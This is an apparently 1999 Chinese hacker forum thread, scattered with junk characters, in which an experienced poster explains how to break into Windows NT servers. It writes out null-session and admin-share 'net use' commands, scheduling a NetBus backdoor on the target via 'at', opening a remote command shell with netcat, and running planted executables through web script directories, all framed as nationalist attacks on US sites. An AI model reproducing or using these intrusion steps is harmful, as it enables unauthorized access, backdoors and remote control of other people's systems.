《版主页黑客工具和文章的几个问题》中提到:6 T0 n3 u' \3 ^% W8 w5 W$ i X
请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
* g5 O# y8 t2 q+ m( A2 M+ [> 我的机子MMX166,WIN98,2。5G,32M内存。
% H* x% p3 d( Z# K: F: Q' z" R, l7 t/ D5 W+ n+ @3 q# V% N
黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。# D: H2 I$ m! h, O2 v
你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。: H g2 ^0 O; R( c9 L2 c
其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:6 Z$ o8 E- O' c
net use \\111.111.111.111\ipc$ "" /user:"", a/ Z9 ?8 O5 _
net.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
& _" c. q3 i5 O/ a8 W: C enet view \\111.111.111.111
7 Y3 y7 B" q, R* Q% H, Z# w当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:; A- D# O# |3 X
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"/ L3 y' E" @" F9 ~9 K
命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
8 p8 d5 f6 k6 w# i+ {0 h$ F) J1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:
# s9 C' S5 M9 U8 Q* J% @- I7 bnet use x: \\111.111.111.111\c$5 f% X9 t5 s* |8 ]" `$ A. V- q* }2 U2 X% C
net use y: \\111.111.111.111\d$
: b& w4 C' |( p" P- e这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
* i: f. G; S0 h- ~4 O$ r2、管理目标NT的用户:
8 J3 H$ r6 l4 v, E; } _4 U从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”
z! U/ L O. l8 q( i; i键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样% w' f8 E6 u0 U
3、管理目标NT的服务* x0 H: ?- u' I: g5 N+ ]9 W- U% f1 r
选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”
; E; s- H7 J' @# {/ O4 w& t! Q0 c这样你可以管理目标NT上的服务,共享目录
% W" M$ l5 J5 y, a, e4、IIS管理! U9 V- h4 y7 [- H: a6 O# M; n
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
( y6 P4 W: T$ p2 D8 Q$ |, l5 R: \目标NT的FTP、WWW服务你就可以重新配置1 _5 C3 A7 C# ?
5、事件管理
- \, N1 p0 ~) ~* v, Y“事件查看器”->连接到服务器->111.111.111.1113 Q/ l& d9 A1 \: q9 ]
3 g/ t) f( w. D7 ~! b5 y# G还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。0 j) x ~3 g l# R& X
1 Z |9 n3 O B9 \5 a3 i
当然,98,95也能做一些事情,但很麻烦,比如:% U' ^: {+ l4 d) v# {3 X1 Z2 i9 }
net use \\111.111.111.111\ipc$, n. v( O+ ^) u
net use z: \\111.111.111.111\d$. t" R G: Y# ?% v1 O; O
但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等8 r7 v$ C% F! M
# _/ n' w* z; u# r7 l我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!; w8 r( V; s/ p1 j' }, o+ V
这样,你还可以了解目标机器上能有什么东东供你去用!
7 W9 V2 R" ?, [; R: } O' p+ g
7 a+ T9 k* L+ c
# W8 N& \: i1 X. m--------------------------------------------------------------------------------
, [* o0 y: K& C7 d, d6 n0 T$ W/ v
>quack于1999-06-12,23:37:44
8 x2 Q8 @7 z4 S4 E在大作《几个有关黑的问题》中提到:" {$ [" I" L2 F" U) X
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。
0 ^7 ^3 z# s3 h0 q1 \1 ^1 I; g
+ v7 c% j7 W3 w$ l) k- }killusa于1999-06-13,03:25:15
: K" J7 [. `6 H/ P9 c' ?在大作《Re: 几个有关黑的问题》中提到:* @. Z8 K! d$ [3 r
- {; q+ d5 L4 R0 c( j6 C& a: ?
letmein.exe 暂时没有mypwd参数,十分抱歉7 S: ~4 h; x B" E) t# e6 e
pinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。; f! j6 u0 [6 j
8 L1 |) S& u+ L& _9 R# y4 X7 x# ^Netbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的: }+ z, A* v' H7 g2 C& Y2 F
服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:/ W; h p+ |4 b% N
4 q& Y) i/ h% N' H2 e1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:! B5 ^( [/ M$ f9 m9 u8 A7 O
9 U& ~& j! O3 ~3 V% e+ I8 p2 w! V9 uC:\>net start schedule
) z4 N: A* U0 _9 c% N7 tSchedule 正在启动服务.....2 G% \/ {" p4 a$ X4 D1 p
Schedulw 服务启动成功。
# B ?8 C* b _: @' n; vC:\>at /?
" l. U9 L. _$ _AT 命令排定在特定的日期和时间运行某些命令和程序。" t& L% M* q/ N. q L
运行 AT 命令之前必须先启动 Schedule 服务。
" [% Z/ h. x" B2 E' b) Q5 D: v+ i3 f$ ~
AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]- p7 W" M" v6 i5 p
AT [\\computername] time [/INTERACTIVE]
/ t; ?( k, C- }- \: {: C6 |7 \( C[ /EVERY:date[,...] | /NEXT:date[,...]] "command", X! J N: p: P$ m: R0 D) r, D3 x0 }
* E3 i9 p }( _% {( ~# z% v! E
\\computername 指定远程计算机。 如果省略这个参数
: \) {( M& @' Z4 N8 B命令会被排定在本机上运行。
3 B6 P0 W2 K6 m3 v/ Y% tid 指定给排定进度命令的识别号。
3 r8 M. G3 b2 ~6 O, Y) [1 F$ X
; u P4 V/ k) ~9 `0 A( C/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。& V% Q( G& C) z' s' D
/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。0 C) X. h, L5 m6 n8 Y/ |
time 指定命令运行的时间。
: ^: Y/ V* ?# B% n2 a# e; [/interactive 允许作业在运行时,与用户通过桌面交互。
1 l/ g- k3 {# M0 G- Y0 w7 P$ v/ C4 ~
& s; C: d8 a. Z! c/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。9 \) |$ ^7 y! X( M% ~9 b
如果省略日期,则默认为在每月的本日运行。
- ]# w9 H2 ?' P" P1 n* \+ z" T- [) d/ t5 R' O1 k C0 r! a, h. v0 T9 J
/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。: k0 G; U- m! K7 F& N
# A+ p& S0 ~0 T6 L$ U* x- G
"command" 准备运行的 Windows NT 命令或批处理文件。% U! o% Y* C2 o5 h z
b! }, u" A$ q; Q8 ?
C:\>
9 U2 K* ]3 j& A( p3 o; b
: R8 L9 G8 ]6 }* O: c5 {# k知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:
* W2 ~4 h1 a+ L6 R# k" a1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser": R: W1 [' W$ }: D: T
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start9 A; ?( l! y" U6 T6 y6 R# i6 x
3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
6 t z U: d/ @at \\x.x.x.x 00:00 ntsrv.exe /port:64321 Y! _4 H. V5 ~& F
其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:9 Q( ] j7 p5 x; G
Microsoft(R) Windows NT(TM)6 |( u) \8 J; p! Q; v% i& x# ~; r
(C) Copyright 1985-1996 Microsoft Corp. J( B% H5 d/ e9 ]+ t4 N# `
C:\>6 E+ q& R1 H: _: [- e! C. `9 |
4 L# ?6 H6 {+ H" m2 D5 {2、利用web启动ntsrv.exe或其他程序在目的服务器
" x: Z+ C( M3 k o# g7 i# g: {
& H+ ^( }: E& H! t' ~/ V1 R# `将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
* N% t+ ?* _; @4 }7 b1 p" K' ^http://x.x.x.x/scripts/ntsrv.exe /port:64321
) {9 i0 }3 _$ w或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
. |1 ?# ? h0 m8 ~& t6 q% ^/ k$ d该程序就启动了( t0 l0 ~% X7 I* i; \- c: g9 Q! G
% L# \% n+ J) N1 _# V我只提这几中方法!
5 x P1 c( s# g: ]要成功,必须打好基础工,对操作系统充分了解!) c/ I; i' z4 D5 ?9 @
7 f. J: u( N; {. N) T4 v
|